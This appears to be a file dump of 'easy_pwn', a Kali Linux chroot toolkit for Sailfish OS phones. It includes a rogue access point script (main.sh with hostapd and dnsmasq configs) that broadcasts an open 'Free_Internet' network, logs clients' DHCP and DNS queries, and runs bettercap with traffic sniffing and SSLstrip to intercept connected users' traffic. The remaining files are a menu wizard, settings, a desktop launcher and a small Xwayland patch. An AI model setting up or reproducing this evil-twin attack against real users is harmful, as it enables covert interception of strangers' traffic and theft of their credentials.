7 | # To disable dnsmasq's DNS server functionality.
8 | port=0
9 |
10 | no-resolv
11 |
12 | server=8.8.8.8
13 | server=8.8.4.4
14 |
15 | # Set gateway as Router. Following two lines are identical.
16 | dhcp-option=option:router,10.0.0.1
17 | dhcp-option=3,10.0.0.1
18 |
19 | # Logging.
20 | log-facility=/tmp/rouge_ap-dnsmasq.log # logfile path.
21 | log-async
22 | log-queries # log queries.
23 | log-dhcp # log dhcp related messages.
24 |
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/mount/scripts/wifi_rogue_ap/hostapd.conf:
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1 | logger_syslog=-1
2 | logger_syslog_level=2
3 | logger_stdout=-1
4 | logger_stdout_level=2
5 |
6 | ctrl_interface=/var/run/hostapd
7 | ctrl_interface_group=0
8 |
9 | ssid=Free_Internet
10 |
11 | hw_mode=g
12 | channel=1
13 | beacon_int=100
14 | dtim_period=2
15 | max_num_sta=255
16 | rts_threshold=-1
17 | fragm_threshold=-1
18 | macaddr_acl=0
19 |
20 | auth_algs=3
21 | ignore_broadcast_ssid=0
22 | wmm_enabled=1
23 |
24 | wmm_ac_bk_cwmin=4
25 | wmm_ac_bk_cwmax=10
26 | wmm_ac_bk_aifs=7
27 | wmm_ac_bk_txop_limit=0
28 | wmm_ac_bk_acm=0
29 |
30 | wmm_ac_be_aifs=3
31 | wmm_ac_be_cwmin=4
32 | wmm_ac_be_cwmax=10
33 | wmm_ac_be_txop_limit=0
34 | wmm_ac_be_acm=0
35 |
36 | wmm_ac_vi_aifs=2
37 | wmm_ac_vi_cwmin=3
38 | wmm_ac_vi_cwmax=4
39 | wmm_ac_vi_txop_limit=94
40 | wmm_ac_vi_acm=0
41 |
42 | wmm_ac_vo_aifs=2
43 | wmm_ac_vo_cwmin=2
44 | wmm_ac_vo_cwmax=3
45 | wmm_ac_vo_txop_limit=47
46 | wmm_ac_vo_acm=0
47 |
48 | eapol_key_index_workaround=0
49 | eap_server=0
50 |
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/mount/scripts/wifi_rogue_ap/main.sh:
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1 | #!/bin/bash
2 | # easy_pwn : rogue access point script
3 |
4 | # load easy_pwn settings
5 | . /mnt/easy_pwn/settings.sh
6 |
7 | echo "(chroot) [!] WARNING: make sure your wifi is enabled in connman"
8 | echo " and not connected, also make sure your mobile data"
9 | echo " is turned on."
10 |
11 | ip addr add 10.0.0.1/24 dev $WLAN_IF
12 | sleep 1
13 |
14 | # Start dnsmasq
15 | echo "(chroot) [-] starting dnsmasq dhcp server..."
16 | if [ -z "$(ps -e | grep dnsmasq)" ]
17 | then
18 | dnsmasq -C /mnt/easy_pwn/scripts/wifi_rogue_ap/dnsmasq.conf
19 | fi
20 |
21 | echo "(chroot) [-] forwarding $WLAN_IF traffic to mobile data..."
22 |
23 | # flush iptables
24 | iptables -F
25 | iptables -t nat -F
26 |
27 | # allow in and out
28 | iptables -P INPUT ACCEPT
29 | iptables -P OUTPUT ACCEPT
30 |
31 | # start nat
32 | iptables -t nat -A POSTROUTING -o $MOBILE_IF -j MASQUERADE
33 | iptables -A FORWARD -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
34 | iptables -A FORWARD -i $WLAN_IF -j ACCEPT # -o $MOBILE_IF
35 |
36 | # enable ip forwarding
37 | echo "(chroot) [-] enabling ip_forward..."
38 | sysctl -w net.ipv4.ip_forward=1
39 |
40 | # fix for xperia X (and compact)
41 | echo 2 > /sys/module/bcmdhd/parameters/op_mode
42 |
43 | # start hostpad
44 | echo "(chroot) [-] starting hostapd..."
45 | hostapd -i $WLAN_IF /mnt/easy_pwn/scripts/wifi_rogue_ap/hostapd.conf &
46 | sleep 2
47 |
48 | # start bettercap with webui, sniffer and http proxy with SSLstrip
49 | echo "(chroot) [-] starting bettercap"
50 | bettercap -caplet http-ui -iface $WLAN_IF --eval "net.sniff on;set http.proxy.sslstrip true;http.proxy on;"
51 |
52 | # on exit flush iptables
53 | iptables -F
54 | iptables -t nat -F
55 | echo "(chroot) done."
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/mount/settings.sh:
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1 | # easy_pwn : settings
2 | # general
3 | OR_LANDSCAPE=false # default landscape is off
4 | ROOT_SESSION=false # default desktop root session is disabled
5 |
6 | # kali linux
7 | KALI_IMG="https://build.nethunter.com/kalifs/kalifs-latest/kalifs-armhf-minimal.tar.xz" # kali rootfs download url
8 |
9 | # device
10 | WLAN_IF="wlan0" # wlan network interface
11 | MOBILE_IF="rmnet_data0" # mobile data network interface
12 |
13 | # easy_pwn
14 | PWN_USER="nemo"
15 | PWN_VERSION="current"
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/src/easy_pwn.desktop:
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1 | [Desktop Entry]
2 | Type=Application
3 | Categories=Easy_pwn;
4 | Icon=XX_ICON_XX
5 | #Icon=icon-launcher-shell
6 | Exec=fingerterm -e 'echo -e "\n [ easy_pwn : XX_NAME_XX ]\n";devel-su XX_PWNPATH_XX/wizard.sh XX_CHROOTPATH_XX'
7 | Name=XX_NAME_XX
8 | X-Nemo-Single-Instance=no
9 | Terminal=false
10 |
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/src/icon.png:
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/src/readme.md:
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1 | - wl_seat.patch stolen from https://github.com/elros34/sailfish_ubu_chroot/
2 | - icon.png script drawner icon
3 | - easy_pwn.desktop template desktop file for sfos
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/src/wl_seat.patch:
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1 | diff --git a/hw/xwayland/xwayland-input.c b/hw/xwayland/xwayland-input.c
2 | index 92e530d0d..b93aa87bd 100644
3 | --- a/hw/xwayland/xwayland-input.c
4 | +++ b/hw/xwayland/xwayland-input.c
5 | @@ -2413,7 +2413,7 @@ input_handler(void *data, struct wl_registry *registry, uint32_t id,
6 | {
7 | struct xwl_screen *xwl_screen = data;
8 |
9 | - if (strcmp(interface, "wl_seat") == 0 && version >= 3) {
10 | + if (strcmp(interface, "wl_seat") == 0 && version >= 2) {
11 | create_input_device(xwl_screen, id, version);
12 | xwl_screen->expecting_event++;
13 | } else if (strcmp(interface, "zwp_relative_pointer_manager_v1") == 0) {
14 |
15 |
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/wizard.sh:
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1 | #!/bin/bash
2 | # Sailfish OS easy_pwn
3 | #
4 | # Copyright (C) 2020
5 | #
6 | # This program is free software: you can redistribute it and/or modify
7 | # it under the terms of the GNU General Public License as published by
8 | # the Free Software Foundation, either version 3 of the License, or
9 | # (at your option) any later version.
10 | #
11 | # This program is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | # GNU General Public License for more details.
15 | #
16 | # You should have received a copy of the GNU General Public License
17 | # along with this program. If not, see .
18 |
19 | # check privileges
20 | if [ "$EUID" -ne 0 ]
21 | then
22 | echo "[!] run as root"
23 | exit 1
24 | fi
25 |
26 | # check args
27 | if [ "$#" -lt 1 ]
28 | then
29 | echo "[!] usage: $0 [kalifs path]"
30 | exit 1
31 | fi
32 |
33 | # set variables
34 | WIZ_PATH=`readlink -f "$0"`
35 | PWN_DIR=`dirname "$WIZ_PATH"`
36 | PWN_SCRIPT=$PWN_DIR/easy_pwn.sh
37 | CHROOT_PATH="$1"
38 |
39 | # import default settings
40 | . $PWN_DIR/mount/settings.sh
41 |
42 | script_selection(){
43 | echo "[+] available scripts:"
44 |
45 | av_scripts=$(ls $PWN_DIR/mount/scripts/)
46 | i=1
47 |
48 | for j in $av_scripts
49 | do
50 | echo " - $i $j"
51 | av_scripts[i]=$j
52 | i=$(( i + 1 ))
53 | done
54 |
55 | read -p "(script) [>] " SC_SELECT
56 | echo "[-] selected: ${av_scripts[$SC_SELECT]}"
57 |
58 | $PWN_SCRIPT script $CHROOT_PATH ${av_scripts[$SC_SELECT]}
59 | }
60 |
61 | input_loop(){
62 | read -p "[>] " SELECTION
63 |
64 | case "$SELECTION" in
65 | 1)
66 | # start chroot desktop
67 | echo "[?] select desktop orientation (default portrait): [p]ortrait, [l]andscape: "
68 | read -p "(desktop) [>]" DESKTOP_ORIENTATION
69 |
70 | if [ "$DESKTOP_ORIENTATION" == "l" ]
71 | then
72 | . $PWN_SCRIPT desktop $CHROOT_PATH --landscape
73 | else
74 | . $PWN_SCRIPT desktop $CHROOT_PATH
75 | fi
76 | ;;
77 | 2) . $PWN_SCRIPT shell $CHROOT_PATH ;;
78 | 3) . $PWN_SCRIPT ssh $CHROOT_PATH ;;
79 | 4) . $PWN_SCRIPT bettercap $CHROOT_PATH ;;
80 | 5) script_selection ;;
81 | 6) . $PWN_SCRIPT update $CHROOT_PATH ;;
82 | 7) . $PWN_SCRIPT kill $CHROOT_PATH ;;
83 | 8) . $PWN_SCRIPT quit $CHROOT_PATH ;;
84 | 00) help_msg ;;
85 | *)
86 | echo "[!] invalid selection"
87 | exit 1
88 | esac
89 | }
90 |
91 | help_msg(){
92 | echo "[+] available options:"
93 | echo " - 1 kali desktop"
94 | echo " - 2 kali shell"
95 | echo " - 3 ssh server"
96 | echo " - 4 bettercap webui"
97 | echo " - 5 run a pwn script"
98 | echo " - 6 update easy_pwn"
99 | echo " - 7 kill all chroot processes"
100 | echo " - 8 umount and quit (experimental)"
101 | echo " - 00 this message"
102 | }
103 |
104 | if test -f "$CHROOT_PATH/etc/hosts"
105 | then
106 | echo " ___ __ _ ___ _ _ _ ____ ___ __"
107 | echo " / _ \\/ _\` / __| | | | | '_ \\ \\ /\\ / / '_ \\ "
108 | echo "| __/ (_| \\__ \\ |_| | | |_) \\ V V /| | | |"
109 | echo " \\___|\\__,_|___/\\__, | | .__/ \\_/\\_/ |_| |_|"
110 | echo " __/ |_____| |"
111 | echo " |___/______|_| ($PWN_VERSION) "
112 | echo " "
113 |
114 | help_msg
115 |
116 | while :
117 | do
118 | input_loop
119 | done
120 | else
121 | echo "[!] $1 is not a valid kali root."
122 | fi
123 |
124 |
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